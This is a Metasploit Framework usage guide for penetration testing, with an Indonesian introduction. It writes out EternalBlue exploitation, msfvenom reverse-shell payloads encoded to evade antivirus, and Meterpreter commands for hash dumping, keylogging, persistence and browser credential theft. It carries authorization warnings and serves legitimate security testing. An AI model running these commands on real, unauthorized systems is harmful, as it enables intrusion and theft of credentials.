# Metasploit Framework > **The World's Most Used Penetration Testing Framework** ## 📋 Overview Metasploit Framework adalah platform open-source yang powerful untuk penetration testing, vulnerability assessment, dan security research. Dikembangkan oleh Rapid7, Metasploit menyediakan tools untuk mengidentifikasi, mengeksploitasi, dan memvalidasi vulnerabilities. ## 🎯 Key Features ### 🎯 **Exploitation Engine** * **1,800+ Exploits** - Wide range of exploit modules * **Payload Generation** - Custom payload creation * **Encoder Integration** - Evasion techniques * **Post-Exploitation** - System manipulation after access * **Evasion Modules** - Anti-virus and firewall bypass ### 🔍 **Scanning and Discovery** * **Auxiliary Modules** - Scanning, fuzzing, and discovery tools * **Reconnaissance** - Information gathering modules * **Vulnerability Scanning** - Automated vulnerability detection * **Network Mapping** - Comprehensive network discovery * **Port Scanning** - Integrated scanning capabilities ### 🛡️ **Testing Modules** * **Brute Force** - Password and credential attacks * **Fuzzing** - Application vulnerability discovery * **Spoofing** - Network manipulation tools * **Sniffing** - Network traffic analysis * **Social Engineering** - Human-targeted attacks ### 📊 **Management Interface** * **msfconsole** - Command-line interface * **msfvenom** - Payload generator * **msfdb** - Database management * **msgrpc** - Remote API interface * **msfweb** - Web interface (Pro version) ## 🚀 Installation ### Kali Linux (Pre-installed) ```bash # Metasploit comes pre-installed on Kali Linux # Update framework sudo msfupdate # Check version msfconsole --version ``` ### Ubuntu/Debian Installation ```bash # Add Rapid7 repository curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/metasploit-framework-http.service -o /tmp/metasploit-framework-http.service sudo mv /tmp/metasploit-framework-http.service /etc/systemd/system/ # Install from source git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework bundle install sudo ./msfdb init ``` ### Docker Installation ```bash # Pull Metasploit image docker pull metasploitframework/metasploit-framework # Run container docker run -it -p 4444:4444 metasploitframework/metasploit-framework # With persistent storage docker run -it -v /tmp/msf:/root/.msf4 metasploitframework/metasploit-framework ``` ### Windows Installation ```powershell # Install Ruby (RubyInstaller+Devkit) # Install Git for Windows # Install PostgreSQL (optional) # Clone repository git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework bundle install ruby msfconsole ``` ## 🔧 Basic Configuration ### Database Setup ```bash # Initialize PostgreSQL database sudo msfdb init # Start database sudo systemctl start postgresql # Connect msfconsole with database msfconsole ``` ### First-Time Setup ```bash # Launch Metasploit msfconsole # Update database msf> db_status msf> db_rebuild_cache # Configure workspace msf> workspace -a my_project msf> workspace my_project ``` ## 🔍 Basic Usage ### msfconsole Interface ```bash # Launch console msfconsole # Basic commands msf> help # Show help msf> search exploit # Search exploits msf> info exploit_name # Show exploit details msf> use exploit_name # Select exploit msf> show options # Show exploit options msf> set RHOSTS 192.168.1.100 # Set target msf> exploit # Run exploit ``` ### Searching Modules ```bash # Search by type msf> search type:exploit msf> search type:auxiliary msf> search type:post # Search by platform msf> search platform:windows msf> search platform:linux # Search by name msf> search eternalblue msf> search smb msf> search web # Search with multiple criteria msf> search eternalblue platform:windows type:exploit ``` ### Using Exploits ```bash # Select exploit msf> use exploit/windows/smb/ms17_010_eternalblue # Show exploit information msf> info # Show required options msf> show options # Set target options msf> set RHOSTS 192.168.1.100 msf> set SMBDomain WORKGROUP msf> set SMBUser user msf> set SMBPass password # Show available targets msf> show targets # Set target msf> set TARGET 0 # Generate and run exploit msf> exploit ``` ## 🎯 Common Use Cases ### 1. **Basic Exploitation** ```bash # EternalBlue exploit msf> use exploit/windows/smb/ms17_010_eternalblue msf> set RHOSTS 192.168.1.100 msf> set payload windows/x64/meterpreter/reverse_tcp msf> set LHOST 192.168.1.50 msf> set LPORT 4444 msf> exploit ``` ### 2. **Web Application Testing** ```bash # WordPress vulnerability scan msf> use auxiliary/scanner/http/wp_login_enum msf> set RHOSTS blog.example.com msf> set USER_FILE /usr/share/wordlists/usernames.txt msf> set PASS_FILE /usr/share/wordlists/passwords.txt msf> run # Directory brute force msf> use auxiliary/scanner/http/dir_scanner msf> set RHOSTS www.example.com msf> set PATH /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt msf> run ``` ### 3. **Network Reconnaissance** ```bash # Port scanning msf> use auxiliary/scanner/portscan/tcp msf> set RHOSTS 192.168.1.0/24 msf> set PORTS 1-1000 msf> set THREADS 50 msf> run # SMB enumeration msf> use auxiliary/scanner/smb/smb_enumshares msf> set RHOSTS 192.168.1.100 msf> set SMBUser guest msf> run ``` ### 4. **Post-Exploitation** ```bash # After getting a Meterpreter session meterpreter> sysinfo meterpreter> getuid meterpreter> ps meterpreter> hashdump meterpreter> screenshot meterpreter> keyscan_start meterpreter> upload exploit.exe meterpreter> execute -f exploit.exe meterpreter> background ``` ## 🔧 Payload Generation with msfvenom ### Basic Payload Creation ```bash # Generate Windows reverse shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe > payload.exe # Generate Linux reverse shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf > payload.elf # Generate Android payload msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f apk > payload.apk ``` ### Encoded Payloads ```bash # Generate encoded payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe # Multiple encoding iterations msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x64/xor_dynamic -i 10 -f exe > multi_encoded.exe ``` ### Payload Formats ```bash # Different output formats msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f c > shellcode.c msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python > shellcode.py msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw > shellcode.bin msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f dll > payload.dll ``` ## 📊 Database Operations ### Workspace Management ```bash # Create workspace msf> workspace -a pentest_project msf> workspace pentest_project # List workspaces msf> workspace # Delete workspace msf> workspace -d pentest_project ``` ### Importing Data ```bash # Import Nmap scan results msf> db_nmap -sS -A -oX scan.xml 192.168.1.0/24 msf> db_import scan.xml # Import Nessus results msf> db_import nessus_report.xml # Import masscan results msf> db_import masscan_output.xml ``` ### Reporting ```bash # List hosts in database msf> hosts # List services msf> services # List vulnerabilities msf> vulns # Generate report msf> report -o /tmp/report.html ``` ## 🔗 Meterpreter Sessions ### Session Management ```bash # List active sessions msf> sessions # Interact with session msf> sessions -i 1 # Background session meterpreter> background # Kill session msf> sessions -k 1 ``` ### Common Meterpreter Commands ```bash # System information meterpreter> sysinfo meterpreter> getuid meterpreter> getpid # File system meterpreter> pwd meterpreter> ls meterpreter> download file.txt meterpreter> upload payload.exe meterpreter> rm file.txt # Network meterpreter> ipconfig meterpreter> route meterpreter> portfwd add -l 8080 -p 80 -r 192.168.1.100 # Process management meterpreter> ps meterpreter> kill 1234 meterpreter> migrate 5678 # Screenshot and keylogging meterpreter> screenshot meterpreter> keyscan_start meterpreter> keyscan_dump # Persistence meterpreter> run persistence -S -U -X -i 10 -p 4444 -r 192.168.1.50 ``` ## 🔧 Advanced Features ### Resource Scripts ```bash # Create resource script (script.rc) use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.50 set LPORT 4444 exploit # Run resource script msfconsole -r script.rc ``` ### Plugin System ```bash # List plugins msf> load # Load plugins msf> load nessus msf> load openvas msf> load pcap_log ``` ### API Integration ```bash # Start RPC service msf> msgrpc ServerHost=192.168.1.50 ServerPort=55553 User=msf Pass=password # Connect via Python import msfrpc client = msfrpc.Msfrpc({'host': '192.168.1.50', 'port': 55553}) client.login('msf', 'password') ``` ## 📈 Post-Exploitation Modules ### Privilege Escalation ```bash # Windows privilege escalation msf> use exploit/windows/local/bypassuac_eventvwr msf> use exploit/windows/local/ms16_032_secondary_logon_handle_privesc # Linux privilege escalation msf> use exploit/linux/local/cve_2016_5195 msf> use exploit/linux/local/glibc_realpath_priv_esc ``` ### Credential Harvesting ```bash # Hash dumping msf> use post/windows/gather/hashdump msf> use post/linux/gather/hashdump # Password dumping msf> use post/windows/gather/credentials/freerdp msf> use post/windows/gather/credentials/vnc # Browser password dumping msf> use post/multi/gather/firefox_creds msf> use post/multi/gather/chrome_creds ``` ### Persistence ```bash # Windows persistence msf> use exploit/windows/local/persistence_service msf> use exploit/windows/local/registry_persistence # Linux persistence msf> use exploit/linux/local/cron_persistence msf> use exploit/linux/local/ld_preload_persistence ``` ## 🔗 Automation and Scripting ### Bash Automation ```bash #!/bin/bash # Automated scanning script TARGET="192.168.1.0/24" LHOST="192.168.1.50" # Initialize Metasploit database msfdb init # Run Nmap scan and import db_nmap -sS -A -oX scan.xml $TARGET # Start Metasploit with resource script msfconsole -r auto_scan.rc ``` ### Python Integration ```python from pymetasploit3 import MsfRpcClient # Connect to Metasploit RPC client = MsfRpcClient('password', port=55553, server='192.168.1.50') # Execute exploit exploit = client.modules.use('exploit', 'windows/smb/ms17_010_eternalblue') exploit['RHOSTS'] = '192.168.1.100' exploit['payload'] = 'windows/x64/meterpreter/reverse_tcp' exploit['LHOST'] = '192.168.1.50' exploit.execute(payload=False) ``` ## 🎓 Learning Resources ### Official Documentation * [Metasploit Official Documentation](https://docs.metasploit.com/) * [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) * [Rapid7 Blog](https://blog.rapid7.com/tag/metasploit/) * [Metasploit Community](https://community.rapid7.com/) ### Practice Environments * **Metasploitable2** - Vulnerable Linux VM for practice * **Metasploitable3** - Modern vulnerable Windows/Linux VMs * **Hack The Box** - Online penetration testing labs * **TryHackMe** - Guided penetration learning paths ## 📊 Comparison with Other Frameworks | Feature | Metasploit | Cobalt Strike | Empire | PTF | | ------------------ | ---------- | ------------- | --------- | --------- | | **Cost** | 🆓 Free | 💰 Enterprise | 🆓 Free | 🆓 Free | | **Exploits** | 1,800+ | Custom | Limited | 1,800+ | | **Payloads** | Extensive | Custom | Custom | Extensive | | **C2 Features** | Basic | Advanced | Advanced | Basic | | **Team Support** | Limited | ✅ | ✅ | Limited | | **Learning Curve** | 📚 Medium | 📚 Hard | 📚 Medium | 📚 Medium | ## 🔧 Troubleshooting ### Common Issues ```bash # Database connection issues sudo systemctl restart postgresql msfdb reinit # Module not found msf> update_db # Permission issues sudo msfconsole # Session stability msf> set exitonsession false msf> set exitfun false ``` ### Debug Mode ```bash # Start with debug output msfconsole -d # Enable verbose logging msf> set GlobalLogLevel 5 # Check module loading msf> loadpath /path/to/custom/modules ``` ## 🛡️ Security and Legal Considerations ### Legal Compliance * **Authorization**: Only test systems you own or have permission * **Documentation**: Keep records of all testing activities * **Scope**: Stay within defined testing boundaries * **Reporting**: Document findings responsibly ### Operational Security * **Infrastructure**: Use isolated testing environment * **Traffic**: Consider VPN or secure connections * **Logs**: Monitor and log all activities * **Cleanup**: Remove all artifacts after testing ### Countermeasures * **Detection**: Understand IDS/IPS signatures * **Evasion**: Use appropriate encoding and techniques * **Noise**: Minimize network impact * **Persistence**: Avoid unnecessary persistence mechanisms *** **⚠️ Legal Notice**: Metasploit should only be used on systems you own or have explicit permission to test. Unauthorized exploitation is illegal. **⚡ Pro Tip**: Always verify targets are in scope before running exploits. Start with reconnaissance modules before attempting exploitation. *📅 Last Updated: 2024*